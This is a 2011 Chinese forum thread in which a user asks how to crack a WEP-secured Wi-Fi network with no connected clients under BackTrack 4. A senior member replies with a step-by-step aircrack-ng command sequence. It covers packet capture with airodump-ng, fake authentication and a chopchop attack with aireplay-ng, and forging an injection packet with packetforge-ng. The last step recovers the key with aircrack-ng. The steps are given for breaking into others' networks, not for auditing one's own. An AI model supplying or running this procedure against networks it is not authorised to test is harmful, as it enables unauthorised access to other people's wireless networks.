ubnt解决方案
查看: 1351|回复: 3

[疑问] 求在BT4下手动PJ无客户端WEP详细步骤

[复制链接]

24

回帖

205

积分

7 小时

在线时间

少尉

注册时间
2010-11-12
金币
179 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2011-3-23 12:42 |显示全部楼层
使用spoonwep2的飘过,谢谢!

4003

回帖

1万

积分

502 小时

在线时间

上校

灌水天才

注册时间
2010-1-1
金币
7287 个
威望
96 个
荣誉
2 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
发表于 2011-3-23 14:39 |显示全部楼层
ifconfig wlan0 up
airmon-ng wlan0 up
无客户端chopchop攻击步骤:
1.airodump-ng --ivs -c 频道 -w 抓包文件名 wlano
2.另外开启shell,进行fakeauth攻击,原理是建立虚拟验证连接,便于实现注入数据包攻击。
  aireplay-ng -1 0 -e AP's ESSID -a AP's Mac -h client'sMac wlan0
3.然后进行chopchop攻击,生成可用的密钥数据流文件。再开启一个shell
   aireplay-ng -4 -b ap‘s mac -h client’s mac wlan0
4.使用packerforge-ng工具构造对该ap生效的注入数据包
  Packetforge-ng -0 -a AP's MAC -h Client's MAC -k 255.255.255.255 -1 255.255.255.255 -y fragment xor file -w writetofile
    aireplay-ng -2 -r writetofile wlan0
5.开启aircrack-ng进行同步wepPJ
  aircrack-ng 文件名*.ivs

无客户端Fragment攻击
  略
  打的累了,不告诉你了。
新大陆
回复

使用道具 举报

24

回帖

205

积分

7 小时

在线时间

少尉

注册时间
2010-11-12
金币
179 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2011-3-23 17:17 |显示全部楼层
谢谢你的指点
回复

使用道具 举报

3

回帖

6

积分

1 小时

在线时间

预备兵

注册时间
2011-1-24
金币
3 个
威望
0 个
荣誉
0 个

尚未签到

发表于 2011-3-23 17:21 |显示全部楼层
像看天数啊呵呵
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册 微信登录

本版积分规则

Archiver | 手机版 | 无线门户 ( 粤ICP备11076993号|粤公网安备44010602008359号 ) |网站地图

GMT+8, 2025-7-4 21:09

返回顶部 返回列表